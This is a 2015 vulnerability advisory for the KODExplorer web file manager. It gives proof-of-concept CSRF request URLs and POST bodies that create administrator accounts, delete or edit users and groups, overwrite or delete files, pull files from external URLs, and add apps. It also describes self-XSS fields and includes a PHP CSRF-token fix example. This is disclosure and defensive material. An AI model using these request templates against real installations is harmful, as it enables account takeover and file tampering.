KODExplorer web file manager versions 3.21 and below suffer from multiple cross site request forgery vulnerabilities.
================================================================================
# KODExplorer web file manager - Cross Site Request Forgery
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
Description : there is no CSRF token protection on the user management area, so an attacker can use the
PoC below to add, edit or remove any user by sending a link to a logged in user with User Management privilege.
# PoC :
Add user :
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator
Delete User:
http://localhost/index.php?member/del&name=[username]
Edit User:
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]
Patch released : check my GitHub fork https://github.com/benkhlifafahmi/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special thanks to both the Tunisian Whitehats Security community and the Arab Oracle Users Group
Additional CSRF Issues:
I - CSRF on Group Management :
Description : an attacker can add, remove or edit any User Group by sending an exploit link to a logged in admin.
Vulnerable Controller : group.class.php
Proof of Concept :
#Add Group : POST Request
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extensions (ex: php|jsp|etc.)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
#Edit Group : POST Request
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extensions (ex: php|jsp|etc.)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
#Delete Group : http://localhost/index.php?group/del&role=[group_name]
------------------------------------------------------------------------
II - CSRF on File Management :
Description : an attacker can create a file, upload a file from an external site, or delete or edit a file/path by sending a link to a logged in administrator.
Vulnerable Controller : explorer.class.php
Proof of Concept :
#Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]
#Delete file : POST Request
action URL: http://localhost/index.php?explorer/pathDelete
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]
#Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]
#Edit file : POST Request
action URL : http://localhost/index.php?editor/fileSave
Post Data: path[path to file]\ncharset[utf-8]\nfilestr[[file content]]
------------------------------------------------------------------------
III - CSRF on App Management :
Description : an attacker can add, edit or remove any app by sending a link to a logged in admin.
Vulnerable Controller : app.class.php
Proof of Concept :
#Add app : POST request
action url : http://localhost/index.php?app/add&name=a
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]
#Delete App : http://localhost/index.php?app/del&name=[your app]
-------------------------------------------------------------------------
IV - Multiple Self XSS :
Description : KODExplorer suffers from several self-XSS issues; the fields vulnerable to XSS are Username, App Name, App Source, Folder Name, File Name and Group Name. To trigger one, inject HTML code into any of the fields listed above.
-------------------------------------------------------------------------
V - Solution :
I have released a fix on my GitHub account; you can clone it or just wait for a patch to be released in the next version, as I have reported all possible vulnerabilities.
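For reference, the shape of the fix every finding above needs is a synchronizer token checked on each state-changing controller action (member/add, group/del, explorer/pathDelete, app/add ...), plus refusing to perform those actions on a bare GET, which is what made the one-click links work. The PHP below is an added example written for this advisory, not KODExplorer's code and not the author's patch; the function names and the `csrf_token` session key / form field are this example's own.

```php
<?php
// Added example: minimal synchronizer-token CSRF guard for a PHP controller.
// Not KODExplorer's code; csrf_token()/csrf_check() and the 'csrf_token'
// session key and request field are names chosen for this example.

session_start();

// Issue (or reuse) one unpredictable token per session. Embed it in every
// form / AJAX call that changes state; it never travels in a shareable URL.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Decide whether a state-changing request may proceed.
// $method  : $_SERVER['REQUEST_METHOD']
// $post    : $_POST (token expected in the 'csrf_token' field)
// $header  : optional X-CSRF-Token header value, for AJAX callers
function csrf_check(string $method, array $post, ?string $header = null): bool {
    // The advisory's member/add, member/del and group/del PoCs are plain GET
    // links; a state change must only ever be accepted over POST.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? $header ?? '';
    if ($expected === '' || !is_string($supplied) || $supplied === '') {
        return false; // no session token yet, or none supplied: reject
    }
    // Constant-time comparison so the check leaks nothing about the token.
    return hash_equals($expected, $supplied);
}

// Usage at the top of each privileged action (e.g. the member/add handler):
$ok = csrf_check(
    $_SERVER['REQUEST_METHOD'],
    $_POST,
    $_SERVER['HTTP_X_CSRF_TOKEN'] ?? null
);
if (!$ok) {
    http_response_code(403);
    exit('CSRF check failed');
}
// ... only now perform the add / edit / delete ...

// In the template that renders the user-management form:
// <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
```

A forged cross-site request can still carry the victim's session cookie, but it cannot read the per-session token to put in the field or header, so the check fails and the action is never reached.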
-------------------------------------------------------------------------
Thanks : I want to say "thank you" for:
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
- Arab Oracle Users Group (@araboug) http://www.araboug.org
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.
Special Greetz to my fiancée.